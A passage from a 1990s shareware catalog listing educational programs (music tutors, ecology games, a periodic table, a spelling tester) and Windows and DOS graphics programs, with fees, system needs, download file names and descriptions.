phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; bonus + data; bonus graphics; bonus game levels; all ASP-wide offers + (see page 6); disks of other shareware; discounts on upgrades; + registration commissions. + Look for: DNUMBR40.ZIP on BBSs (call 573-774-5907 to download it + at no charge); DNUMBR.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 0 (or contact userID 71373,572 for assistance). + SWREG#: 6261 + Download size: 1120k (about 83 minutes with a 2400 baud modem) + Description: + Arithmetic practice windows game for ages 7-12. Game includes + animation, music, and sound effects. The loveable Derik the + Dinosaur continually thwarts the shenanigans of Rex the + Tyrannosaurus. The object of the game is to collect cows. To + rescue cows from Rex the Tyrannosaurus, Derik the Dinosaur must + solve various arithmetic tasks. Level is completed when a + player collects all cows on that level. Each level includes + bonus items for earning more points. "Can't loose" feature + encourages learning. + + + Product: Equatron + Beat the computer at solving the equation. See full + description on page 599. + + + 13.14 Music + + See also: Home & hobby, Music. + + Chapter 13, "Education" 472 + + + + Product: MOZART (Virtuoso Edition) + Music processor. See full description on page 552. + + Product: A MUSICAL TUTORIAL + Author: R. Swerdfeger, 613-933-7871 + Version: 1.1 (06-01-95) + Needs: IBM PC, DOS 4.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor. + Strongly recommended: Mouse; Epson printer. + Registration fee: $25.00 (add $2.50 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 1-month return policy; + disks of other shareware; discounts on other products; + discounts on upgrades. 6-month free upgrading allowed. + Look for: MTDOS11.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + An excellent way to promote and encourage musical study using a + graphically oriented environment. Great for children or adults. + Treble & bass sight reading (notes & chords). Associate notes + to piano keys. Chord dictionary. Action games to promote + learning. Play, view, and print scales, chords, and broken + chords. User log tracks learning. Play classics. Print sight + reading test papers (3 difficulty levels). Key signature + recognition, Etc. Makes music lessons fun for children or + adults! + + + Product: A MUSICAL TUTORIAL for Windows + Author: R. Swerdfeger, 613-933-7871 + Version: 1.2 (06-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; VGA + monitor; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Mouse; Epson printer; sound card. + Registration fee: $25.00 (add $2.50 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + 1-month return policy; bonus utilities; disks of other + shareware; discounts on other products; discounts on upgrades. + 6-month free upgrading allowed. + Look for: MTWIN12.ZIP on BBSs. + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + An excellent way to encourage musical study using a graphically + oriented environment. Treble / Bass note & chord sight reading. + Associate notes to piano keys. Chord dictionary. Action games + to promote learning. Play, view and print scales, chords and + broken chords. User log tracks learning. Play classics. Print + sight reading test papers. User levels. Key signature + + Chapter 13, "Education" 473 + + + + recognition, Etc. Makes music lessons fun for children or + adults! Supports SuperVGA. + + + Product: MusicEase + Music score editor with WYSIWYG interface. See full + description on page 553. + + Product: NoteWorthy + Music publishing system. See full description on page 554. + + + 13.15 Science & ecology + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 430. + + Product: Ecomaster + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.01 (09-01-95) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk; + Mouse. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, CompuServe, mail support; bonus utilities; bonus data; + bonus graphics; bonus game hints; disks of other shareware; + discounts on other products. + Look for: availability unknown on BBSs; ECO.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 76703,3046 for + assistance). + SWREG#: 7161 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + A diverting ecology game for one or more players in which you + bid for and trade animals based on their abilities to thrive in + different environments. No previous biological experience is + assumed. For ages 10 and up. Uses digitized photography of + the animals the animals and scanned images for the ecological + backdrops. + + + Product: GREEN + Ecology simulation game. See full description on page 620. + + Product: Grow'Em + Grow from seed/cuttings. Easy, slick, great p. See full + description on page 534. + + Product: Marnav + Conversion of GPS to and from LORAN data. See full description + on page 570. + + Chapter 13, "Education" 474 + + + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 344. + + Product: Periodic Table + Author: SMI Corporation, 918-241-2301 + Version: 3.0b (08-22-95) + Needs: IBM 80386, Windows 3.1 or better. 3072k RAM; VGA monitor; + Hard disk. + Strongly recommended: Mouse. + Registration fee: $30.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $8.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 1-month return policy; all ASP-wide offers (see page 6); + discounts on other products. + Look for: PT302.ZIP on BBSs (call 918-747-2542 to download it at + no charge); PERTAB.ZIP on CompuServe in CIS:WINPROD forum + LIBrary 14 (or contact userID 72644,2335 for assistance). + SWREG#: 5289 + Download size: 946k (about 70 minutes with a 2400 baud modem) + Description: + The periodic table on command. It shows all 110 chemical + elements. Gives over 30 data items for each one. View element + details on multiple elements via its MDI interface. It has data + on over 800 isotopes and can display radioactive decay trees + for over 500. Has a quiz mode to test your knowlege of the + elements. View bond properties. Allows printing of the Table, + data and decay trees. Has x-ray data. Supports the Windows + clipboard. Great for students, researchers or professionals. + + + Product: TommySoftware CAD/DRAW 4 Level1 + The 32bit verison of the CAD shareware stand. See full + description on page 484. + + Product: WinDatCon + Windows data conversion program. See full description on + page 115. + + + 13.16 Writing + + See also: Writing applications. + + Product: BIBLOGIC + Bibliographic reference database manager. See full description + on page 194. + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 200. + + Chapter 13, "Education" 475 + + + + Product: Cliche Finder + Checks writing cliches. See full description on page 193. + + Product: Creativity Package + Become more creative & improve your writing. See full + description on page 197. + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 605. + + Product: Zpeller + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 4.10 (01-01-95) + Needs: IBM PC, DOS 2.11 or better. 330k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Dual 720k floppy drives; Hard disk; + Mouse. + Registration fee: $19.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + all ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. Lifetime free upgrading allowed. + 99 free update disk(s) sent out. + Look for: ZPELR410.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ZPELER.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 70272,3317 for assistance). + SWREG#: 68 + Download size: 370k (about 28 minutes with a 2400 baud modem) + Description: + An easy and effective way to improve spelling and vocabulary + for the individual student or an entire classroom. Tests + students in not only correct spelling but the word's + definition. Tracks words continually missed to help the + th + student concentrate on those words. Whether the user is a 4 + grader with weekly tests or an out of school adult wanting to + improve those crucial spelling and vocabulary skills; Zpeller + is there to help. Handles up to 19 students at once, up to + 64,000 words per student. + + + 13.17 Software tools & add-ins + + 13.17.1 For other + + Product: WinFlash + Windows flash card program. See full description on page 436. + + Chapter 13, "Education" 476 + + + + 13.18 Other + + Product: Puffwort's Evil Scheme + Author: Impact D. Publishing, 619-346-6609 + Version: 1.1 (10-01-95) + Registration fee: $15.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited phone, + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 6); discounts on other products. Free Impact + Product Information Kit software package. + Look for: PEVILS11.ZIP on BBSs. + Download size: 1383k (about 103 minutes with a 2400 baud modem) + Description: + It's funny, it's fun, and it's got an important message! You + are pitted against an evil wizard who is attempting to bring + suffering to his land. You're the hero. You're confronted by + obstacles such as a locked room, torture pit, maze, and other + challenges, and players can actually win real prizes! There's + more! Not just filled with excitement, humor, drama, and fun, + it also points out deception in cigarette advertising and + dangers of tobacco use. + + Chapter 14, "Graphics" 477 + + + + + + Chapter 14 + Graphics + + + 14.1 Viewing programs + + Product: BitMapZ For Windows + Windows BMP Slide Show & Presentation System. See full + description on page 490. + + Product: Bubble Chart + Bubble Chart, animated graph. See full description on + page 274. + + Product: Drag And View + File viewers for Windows 3.1. See full description on page 47. + + Product: ES-NMB + Network message board. See full description on page 368. + + Product: Image'n'Bits + Author: Bananas Software Inc, 201-265-9855 + Version: 1.0 (11-24-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2k RAM. + Registration fee: $25.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited fax, CompuServe, mail support. 3-month free + upgrading allowed. + Look for: availability unknown on BBSs; IMA.ZIP on CompuServe in + CIS:GRAPHSUP forum LIBrary 5 (or contact userID 70372,3466 for + assistance). + Download size: 470k (about 35 minutes with a 2400 baud modem) + Description: + Multiple image display, OLE, full clipboard support, printing, + funhouse distortion filters, multiple edge detection, + algorithms, contrast & brightness adjustments, histogram tool, + blurring, sharpening, low and high pass filtering, embossing, + on line help, dithering, color reduction, various file format + conversions, add text to images, posterization, mosaic, gray + scale, etc. + + + Product: IPIN PhotoCalendar + Schedule your works with personalized photos. See full + description on page 139. + + Product: Jasc Media Center + Multimedia file cataloging. See full description on page 506. + + Product: Katelin Comment Manager + Full featured file/comment manager. See full description on + page 48. + + Chapter 14, "Graphics" 478 + + + + Product: Paint Shop + Author: JASC, Inc., 612-930-9171 + Version: 3.0 (08-14-93) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 3-month limited return policy. + Look for: PS.ZIP on BBSs; PS.ZIP on CompuServe in CIS:WINSHARE + forum LIBrary 10. + Download size: 248k (about 19 minutes with a 2400 baud modem) + Awards & nominations: 1994 winner, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 finalist, Shareware + Industry Awards. + Description: + This Windows program will display, convert, alter, print + images. Paint Shop supports BMP, CUT, DIB, GIF, IMG, LBM, MAC, + MSP, PCX, PIC, RLE, TGA, TIFF, and WPG. Altering includes + resizing, cropping, dithering, color adjusting, and much more. + Also does screen capturing. Editor's Choice - Shareware + Magazine. + + + Product: Paint Shop Pro + Complete painting image creation editing tool. See full + description on page 486. + + Product: Papers + Wallpaper utilities for Windows. See full description on + page 170. + + Product: PictureClock + Alarm clock w/drag-n-drop graphic file viewer. See full + description on page 123. + + Product: PrintGF + Image printer. See full description on page 77. + + Product: PrintGL + Pen plotter emulator package. See full description on page 78. + + Product: RISS Icon Pak + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 1.3 (05-02-94) + Needs: IBM AT (80286), Windows 3.0 or better. + Registration fee: $16.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, newsletter, mail support; 3-month return policy; + + Chapter 14, "Graphics" 479 + + + + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: RISSICON.ZIP on BBSs (call 401-7673931 to download it + at no charge); RICON.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + 2001 icons for Windows, plus the handy RISS Icon viewer utility + for viewing icons on a full-screen window! The icons are + conveniently categorized and divided into library collections, + such as games, applications, utilities, system, and many more. + Comes complete with SETUP system to automatically install on + "auto pilot". + + + Product: Super VGA Puzzle + Puzzle program based on travel photography. See full + description on page 612. + + Product: VuGrafix Image Viewer + Author: Informatik Inc., 610.640.0339 + Version: 1.30 (12-10-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; VUGRAF.ZIP on CompuServe + in CIS:WINAV forum LIBrary 7 (or contact userID 76534,1166 for + assistance). + SWREG#: 7675 + Download size: 285k (about 21 minutes with a 2400 baud modem) + Description: + Graphic image viewer. Edit, print , convert graphics. Supports + 10 graphics formats, including GIF, TIF, JPEG, WMF, WPG, etc. + Thumbnails. Easy to use. + + + Product: WinClip + Author: OsoSoft (George Campbell), 805-528-1759 + Version: 3.5 (04-15-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited fax, BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + + Chapter 14, "Graphics" 480 + + + + page 6); discounts on upgrades. Lifetime free upgrading + allowed. + Look for: WINCLIP.ZIP on BBSs (call 805-528-1759 to download it + at no charge); WNCLIP.ZIP on CompuServe in CIS:DTPFORUM forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + An ideal way to view, print, and manage BMP, PCX, and GIF + files. AutoZoom shows images same size. Zoom from 10% to 500%. + Scroll. Prints individual images or thumbnail catalogs, with + file names and directories. Move, copy, or delete files. Load + any image into graphics editor of choice. Fast and easy to use. + + + 14.2 Drawing/editor programs + + See also: Business, Organization charts. + + Product: Cards+More + Author: Informatik Inc., 610.640.0339 + Version: 2.4 (12-01-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $29.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; CARDSM.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 7 (or contact userID 76534,1166 + for assistance). + SWREG#: 6325 + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + Versatile, easy-to-use graphics program. Creates cards, + announcements, labels, name tags, table tents, etc. Text, + graphics, shapes, lines. Supports 10 graphics formats. Re- + sizing, snap-to-grid, drag & drop. Many text attributes, in + cluding 180-degree rotation. Code 39 bar codes, POSTNET, auto- + numbering, import, merge, crop marks. High quality printing. + File managment. + + + Product: DeltaCad + CAD program. See full description on page 493. + + Product: DRAFT CHOICE + Powerful, vector based CAD program. See full description on + page 494. + + Chapter 14, "Graphics" 481 + + + + Product: EDGEFLOW + Author: Pacestar Software (John Daleiden) + Version: 5.0 (02-24-93) + Needs: IBM PC, DOS 2.0 or better. 500k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor; Mouse. + Strongly recommended: Hard disk; HP LaserJet printer; + Postscript printer; Epson printer. + Registration fee: $49.95 (add $10.00 for shipping to Canadian + addresses) (add $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6). + Look for: EDGFLW.ZIP on BBSs (call 415-323-4193 to download it at + no charge). + Download size: 235k (about 18 minutes with a 2400 baud modem) + Description: + A flowcharting and diagramming program for DOS. It provides + fast, powerful, easy to use features for creating, maintaining, + and formatting any type of diagram consisting of shapes and + connectors (arrows) between shapes. Shapes automatically + adjust to text. Connectors automatically adjust when + connecting figures are moved. Pop-up menu interface, highly + customizable, WYSIWYG output to many printers including most + laser printers and many plotters. + + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 189. + + Product: FF Business Cards + Create/print business and rolodex cards. See full description + on page 128. + + Product: FF Designer Envelopes + Drag and drop envelope designer/printer. See full description + on page 81. + + Product: Gif+Web Transparent GIF Editor + Author: Informatik Inc., 610.640.0339 + Version: 1.10 (12-28-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + + Chapter 14, "Graphics" 482 + + + + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; GIFWEB.ZIP on CompuServe + in CIS:INETRES forum LIBrary 9 (or contact userID 76534,1166 + for assistance). + Download size: 195k (about 15 minutes with a 2400 baud modem) + Description: + Converts bitmap, GIF, TIFF and JPEG graphic files to GIF images + with transparent backgrounds. Support for dithered-colored + backgrounds. Optional grey background. Easy to use and + verstile. + + + Product: Home Plan + Draw, print, edit & save house plans. See full description on + page 495. + + Product: Hubble + Hubble 2.21 image + doc edit & processing. See full + description on page 489. + + Product: PageFocus + Author: Creative Stars, Inc., 206-485-1737 + Version: 3.1 (01-13-96) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; VGA + monitor; Hard disk; Mouse. + Strongly recommended: SVGA monitor. + Registration fee: $29.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of phone, CompuServe, mail support. 6-month + free upgrading allowed. + Look for: availability unknown on BBSs; PFOCUS31.ZIP on + CompuServe in CIS:GRAPHSUP forum LIBrary 0 (or contact userID + 102337,1132 for assistance). + Download size: 1080k (about 80 minutes with a 2400 baud modem) + Description: + For creating form/drawing/document/database: letter, brochure, + form, invoice, document, electronic book, catalog, etc., or + create form applications. Feature-packed yet easy-to-use. + Designed for everyday use. + + + Product: ProtoCAD 3D + 3-dimensional CAD/rendering program. See full description on + page 497. + + Product: SCP + Screen capture & print text to bitmap. See full description on + page 69. + + Chapter 14, "Graphics" 483 + + + + Product: SmartDraw + Drag & drop flowcharting & draw for Windows. See full + description on page 500. + + Product: SmartDraw 95 + Drag & drop flowcharting & draw for Windows. See full + description on page 500. + + Product: TommySoftware CAD/DRAW + Author: TommySoftware, N.A., Inc., 212-807-9720 + Version: 2.04E (06-01-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; VGA monitor. + Strongly recommended: Mouse. + Registration fee: US$59.95 (add US$5.00 for shipping to U.S. + addresses) (add US$12.00 for shipping to Canadian addresses) + (add US$15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); 3 months of + unlimited BBS, CompuServe, GEnie, newsletter support; bonus + utilities; bonus data; bonus fonts; bonus graphics; bonus + templates; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. + Look for: availability unknown on BBSs. + Download size: 1440k (about 107 minutes with a 2400 baud modem) + Description: + A low-cost but full-featured CAD drafting package that is + suitable for anyone who needs to draw with precision but who + doesn't need a high-end CAD package. This easy-to-use, cost- + effective professional-quality software product combines 2-D + drafting functionality with a fast redraw speed, pop-up menus, + support for 256 layers, and the ability to import or export + graphic data. More than 150.000 copies sold world wide. Quality + made in Germany. + + + Product: TommySoftware CAD/DRAW 4 Level1 + Author: TommySoftware, N.A., Inc., 212-807-9720 + Version: 4.00e (09-12-95) + Needs: Unknown. 4096k RAM; VGA monitor; Mouse. + Registration fee: US$79.95 (add US$5.00 for shipping to U.S. + addresses) (add US$12.00 for shipping to Canadian addresses) + (add US$15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); lifetime + unlimited fax, BBS, CompuServe, GEnie, newsletter support; + bonus utilities; bonus data; bonus fonts; bonus graphics; bonus + templates; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs. + Download size: 2700k (about 201 minutes with a 2400 baud modem) + Description: + A full fledged 32 bit graphics application that combines the + advantages of powerful illustration packages with the precision + of CAD products without their complicated interfaces. + + Chapter 14, "Graphics" 484 + + + + TommySoftware CAD/DRAW 4 Level 1 is the preferred tool for + sketching, drafting, floor plans, landscape design, technical + illustrations or designs. Quality made in Germany. Successor of + CAD/DRAW 2. + + + Product: TommySoftware Tek Illustrator + Author: TommySoftware, N.A., Inc., 212-807-9720 + Version: 3.16e (06-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: US$129.00 (add US$5.00 for shipping to U.S. + addresses) (add US$12.00 for shipping to Canadian addresses) + (add US$15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); lifetime + unlimited BBS, CompuServe, GEnie, newsletter support; bonus + utilities; bonus data; bonus fonts; bonus graphics; bonus + templates; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: availability unknown on BBSs. + Download size: 2600k (about 193 minutes with a 2400 baud modem) + Description: + A full-featured illustration program with the capabilities of + high-end drawing packages at a fraction of the cost. A good + add-on to a person's suite of desktop applications, it lets + even inexperienced users t up to speed quickly. Anyone who + needs to create technical illustrations and graphics quickly + but precisely will appreciate its very rich array of features. + Quality made in Germany. + + + Product: Top Draw + Author: Top Software, 303-838-0384 + Version: 3.1 (05-01-96) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; Hard disk; + Mouse. + Strongly recommended: SVGA monitor. + Registration fee: $49.95 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, newsletter, mail support; 2-month limited return + policy; bonus utilities; bonus data; bonus graphics; bonus + + Chapter 14, "Graphics" 485 + + + + templates; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: TOPDR31.ZIP on BBSs; TOPDR31.ZIP on CompuServe in + CIS:DTPFORUM forum LIBrary 6 (or contact userID 72643,436 for + assistance). + SWREG#: 1811 + Download size: 1341k (about 100 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 winner, Shareware Industry + Awards. + Description: + 1994 SIA Award Winner for Best Graphics Program! Powerful yet + easy to use drawing program for Windows. For: DTP, charts, + illustrations, logos, brochures, newsletters, more. Rotating + text, text on a line, convert text to curves, text wraps to fit + shapes, gradient fills, textures, calligraphic pens, unlimited + named layers, complete Bezier curve support, context-sensitive + help, status line, excellent shape palette, comprehensive + multi-level undo. Import/export WMF, BMP and PCX. Much more! + + + Product: TreeDraw + Family tree graphics chart editor. See full description on + page 536. + + + 14.3 Paint programs + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 189. + + Chapter 14, "Graphics" 486 + + + + Product: Paint Shop Pro + Author: JASC, Inc., 612-930-9171 + Version: 3.11 (08-14-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $69.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; bonus graphics; discounts on + upgrades. + Look for: PSP311.ZIP on BBSs (call 612-930-3516 to download it at + no charge); PSP.ZIP on CompuServe in CIS:JASC forum LIBrary 19 + (or contact userID 74774,570 for assistance). + SWREG#: 4448 + PsL#: 10286 + Download size: 1800k (about 134 minutes with a 2400 baud modem) + Awards & nominations: 1994 winner, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 finalist, Shareware + Industry Awards. + Description: + The complete Windows graphics program for image creation, + viewing, and manipulation. Features include painting with 8 + brushes, photo retouching, image enhancement and editing, color + enhancement, image browser, batch conversion and scanner + support. Included are 20 standard filters and 12 deformations. + Support plug-in filters. Over 34 file formats supported. + + + Product: PC-Draft II + Author: Natural Software (Michael Allen), 708-377-7320 + Version: 3.26 (01-01-93) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Mouse. + Registration fee: $50.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; 3-month return policy; bonus utilities; all ASP-wide + offers (see page 6). + Look for: PCD2-*.ZIP on BBSs; PC-DRA.ARC on CompuServe in + CIS:PCAPP forum LIBrary 10 (multiple files) (or contact userID + 70047,744 for assistance). + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + General purpose paint program. Includes graphics and text + screen capture & the PIX graphics language for animated + slideshows. Exports GEM .IMG format - perfect to include in + your word processor. Supports most Laser & dot-matrix printers. + Draw circles, lines, boxes, shaded rectangles, spray paint, + free-form drawing, edit fill patterns, and fonts; keyboard + + Chapter 14, "Graphics" 487 + + + + macros; creates line and bar graphs; comes with clip-art + library. Makes bitmaps up to 1280x700 dots. + + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 87. + + 14.3.1 Graphics diversions + + Product: DAZZLE + Author: Worldwide MicroTronics, Inc., 713-298-1698 + Version: 5.1b (03-19-95) + Needs: IBM PC, DOS 3.1 or better. 350k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: VGA monitor; Hard disk; math coprocessor. + Registration fee: $15.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, newsletter, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; DAZZLE.ZIP on CompuServe + in CIS:PCFUN forum LIBrary 5 (or contact userID 76236,1573 for + assistance). + SWREG#: 150 + PsL#: 11205 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + A 2D image engine for DOS and Windows as seen on CNN + FutureWatch. This non-TSR program has many images and menus. + Now the generally recognized defacto standard for self- + directing computer art. Config menu, help, integrated doc file, + fades. A version of this program was used to make the DAZZLE + Long Form Music Video from Miramar, now on VHS and video + LaserDisk. + + Chapter 14, "Graphics" 488 + + + + Product: Frenetic Screensaver + Author: Seraline Pty Ltd, +61-2-879-4482 + Version: 3.3 (06-01-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor. + Strongly recommended: SVGA monitor. + Registration fee: $10.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 3 months of + unlimited fax, CompuServe, mail support; all ASP-wide offers + (see page 6); discounts on upgrades. + Look for: FRENET33.ZIP on BBSs; FRENET.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 9 (or contact userID 72317,3646 for + assistance). + SWREG#: 4667 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Endless colorful graphic abstractions are painted from a wealth + of drawing elements. Windows screensaver. Uses a 256 color + palette or 16-color VGA. + + + Product: Hubble + Author: Hubble Software Company (Griengsak Narasirisinlapa) + Version: 2.21 (06-15-95) + Needs: IBM AT (80286), Windows 3.0 or better. 4096k RAM; Hard + disk; Mouse. + Registration fee: $37.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; HUBBLE.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 10 (or contact userID 74544,3676 for + assistance). + SWREG#: 3501 + Download size: 1156k (about 86 minutes with a 2400 baud modem) + Description: + Image editing, processing and manipulation. Add drawing, text, + etc. image patching, area fill. Process multiple images by + merge and stitch(+scaling). Interactive fine-tuning of + brightness, tone, color and contrast of image. Predefined and + custom design of filters, color conversion and dithering. + Document processing allows users to add and rearrange drawings, + text, etc. to document. Transform, scale, flip, and trim + images. Screen capture. Support TWAIN scanner. + + + Product: Image'n'Bits + Image enhancement program for Windows. See full description on + page 477. + + Chapter 14, "Graphics" 489 + + + + Product: JailBird + Author: RMH Computer Services (Richard Holler), 317-782-9903 + Version: 2.50 (03-25-95) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $19.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6). + Look for: JBIRD250.ZIP on BBSs (call 317-784-2147 to download it + at no charge); JBIRD.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 17 (or contact userID 73567,1547 for assistance). + SWREG#: 1494 + Download size: 220k (about 17 minutes with 